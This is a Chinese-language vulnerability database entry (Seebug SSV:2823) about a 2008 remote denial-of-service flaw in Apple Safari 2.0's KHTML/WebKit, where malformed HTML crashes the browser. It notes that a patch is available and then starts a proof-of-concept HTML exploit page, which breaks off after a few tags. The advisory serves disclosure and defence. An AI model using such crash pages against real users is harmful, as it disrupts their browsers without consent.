Apple Safari KHTML WebKit远程拒绝服务漏洞

2008-01-16T00:00:00
ID SSV:2823
Type seebug
Reporter Root
Modified 2008-01-16T00:00:00

Description

BUGTRAQ ID: 27261

Safari是苹果家族操作系统默认所捆绑的WEB浏览器。

Safari处理畸形格式的HTML文档时存在漏洞,远程攻击者可能利用此漏洞导致浏览器崩溃。

Safari没有正确地验证KHTML Webkit。如果用户受骗访问了恶意的HTML页面的话,就会导致浏览器崩溃。

Apple Safari 2.0 Apple


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://www.apple.com target=_blank>http://www.apple.com</a>

                                        
                                            
                                                &lt;html&gt;
&lt;head&gt;
&lt;title&gt;Safari&nbsp;Exploit&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;

&lt;form&gt;
&lt;div&nbsp;id=&quot;foo&quot;&nbsp;style=&quot;display:none;&quot;&gt;
&lt;tab